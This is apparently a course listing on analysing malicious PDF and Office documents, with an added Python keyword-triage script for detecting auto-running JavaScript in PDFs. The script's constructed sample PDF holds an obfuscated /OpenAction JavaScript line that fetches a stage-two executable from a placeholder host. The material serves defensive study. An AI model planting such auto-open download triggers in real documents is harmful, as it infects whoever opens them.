Did you know that you can infect your computer just by opening a PDF or Microsoft Office document? If that comes as a shock, you need this course. Documents are one of the main attack vectors for malware authors because of their widespread use: everyone uses them for reports, memos and articles, and almost all written communication passes through them, which makes them a very popular way to infect computers. A document is typically the first stage of an attack. Embedded in it is a script (JavaScript in a PDF, a VBA macro in an Office file) that downloads a second-stage payload consisting of additional malware, e.g. ransomware, remote access tools and more.
In this course, you will learn how to check and analyze malicious PDF and Office documents for malicious artifacts and indicators of compromise. This is a beginner's course, aimed at those who are completely new to the field. I will take you from zero to a proficient level in analyzing malicious documents, using plenty of practical walk-throughs. We will cover the basic knowledge and skills needed to analyze documents, and all the required tools, together with where to download them, will be provided. By the end of this course, you will have the fundamentals of document malware analysis under your belt and can go on to further study in this field. Even if you do not intend to take up malware analysis as a career, the knowledge and skills gained will let you check documents for dangers and protect yourself from these attacks.
We will use a REMnux and a Windows virtual machine. REMnux is a Debian-based Linux distribution that contains all the necessary tools for malware analysis. Some background in Linux is helpful but not strictly necessary. We will also install document debuggers in the Windows virtual machine. Then I will show you how to get started with the basic tools in REMnux and Windows. All the essential theory will be covered but kept to a minimum; the emphasis is on practicals and lab exercises.
Go ahead and enroll now and I will see you inside.
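The first-stage mechanism described above, a document whose embedded script fires automatically when it is opened, is exactly what PDF triage tools such as pdfid look for: the presence of a scripting keyword (/JS, /JavaScript) together with an auto-action keyword (/OpenAction, /AA). The Python script below is an added example, not code from this course or from pdfid itself. It counts those triage keywords in a PDF and normalizes the hex-escaped name obfuscation that PDF syntax permits (/J#61vaScript is the same name as /JavaScript), so an obfuscated keyword is counted like a plain one. The sample PDF, its object layout and the URL inside it are constructed for the example.

```python
"""pdfid-style keyword triage for PDF files (added example, not course material)."""
import re

# Keywords that malicious-PDF triage tools report. A scripting keyword plus an
# auto-action keyword is the classic first-stage indicator.
TRIAGE_KEYWORDS = (
    "/JS", "/JavaScript", "/AA", "/OpenAction", "/Launch",
    "/EmbeddedFile", "/RichMedia", "/AcroForm", "/XFA", "/ObjStm", "/URI",
)

# A PDF name is '/' followed by regular characters; '#xx' is a hex-escaped byte.
NAME_RE = re.compile(rb"/(?:[^\s/<>\[\]()%{}#]|#[0-9A-Fa-f]{2})+")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_name(raw: bytes) -> str:
    """Decode '#xx' hex escapes so that b'/J#61vaScript' becomes '/JavaScript'."""
    decoded = HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return decoded.decode("latin-1")


def count_keywords(pdf: bytes) -> dict:
    """Count triage keywords across the whole file, like pdfid does.

    This is a byte scanner, not a PDF parser: names inside streams or strings
    are counted too, which is what you want for triage (obfuscated samples
    often hide keywords in places a strict parser would not look).
    """
    counts = {k: 0 for k in TRIAGE_KEYWORDS}
    obfuscated = 0
    for match in NAME_RE.finditer(pdf):
        raw = match.group(0)
        name = normalize_name(raw)
        if name in counts:
            counts[name] += 1
            if b"#" in raw:          # keyword was hex-escaped: obfuscation
                obfuscated += 1
    counts["obfuscated_keywords"] = obfuscated
    return counts


def triage(pdf: bytes) -> tuple[dict, list[str]]:
    """Return keyword counts and a list of human-readable findings."""
    counts = count_keywords(pdf)
    findings = []
    script = counts["/JS"] + counts["/JavaScript"]
    auto_action = counts["/OpenAction"] + counts["/AA"]
    if script and auto_action:
        findings.append("script runs automatically on open (/OpenAction or /AA with /JS)")
    if counts["/Launch"]:
        findings.append("/Launch action can execute an external program")
    if counts["/EmbeddedFile"]:
        findings.append("embedded file present (possible dropped payload)")
    if counts["obfuscated_keywords"]:
        findings.append("hex-escaped keyword names (obfuscation)")
    return counts, findings


# Constructed sample: a minimal PDF whose catalog /OpenAction points at a
# JavaScript action; the action type name is hex-escaped and the URL is a
# placeholder (.invalid TLD), not a real payload location.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /J#61vaScript /JS (app.launchURL("http://example.invalid/stage2.exe")) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    counts, findings = triage(SAMPLE_PDF)
    for keyword, n in counts.items():
        if n:
            print(f"{keyword:22} {n}")
    for finding in findings:
        print("!", finding)
```

Counting alone is not a verdict: /AcroForm or /URI in a benign form is normal, and a clean count does not prove a file is safe, because keywords can sit inside compressed object streams (/ObjStm) that a byte scanner cannot see without decompressing. That is why the course follows keyword triage with pdf-parser and peepdf, which decode the objects themselves.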
Installing the Tools
Malware Analysis Process
3. Installing a Windows VM
4. Configuring Windows VM
5. Installing Adobe Acrobat Reader and Microsoft Office 2013
6. Installing REMnux
7. Post-Install Configurations
8. Summary of Virtual Machines
Intro to Static Analysis
Analyzing PDF Documents
Performing JavaScript Analysis
12. Introduction to Analysis of PDF Documents
13. PDF Objects
14. PDF Keywords
15. String and Data Encoding
16. PDF Analysis Tools
17. Lab: Using pdfid and pdf-parser
18. How to Fix YARA Include File Error
19. Lab: Using peepdf
Lab: PDF Analysis
Analyzing Office Documents
Performing VBA Script Analysis
Using Debuggers in Document Analysis
Lab: Analyzing an Office Document
Resources for Further Study
31. Introduction Lab Exercise: Analyzing an Office Document
32. Lab Walkthrough: Document Analysis
33. Lab Walkthrough: Debugging a Malicious Office Document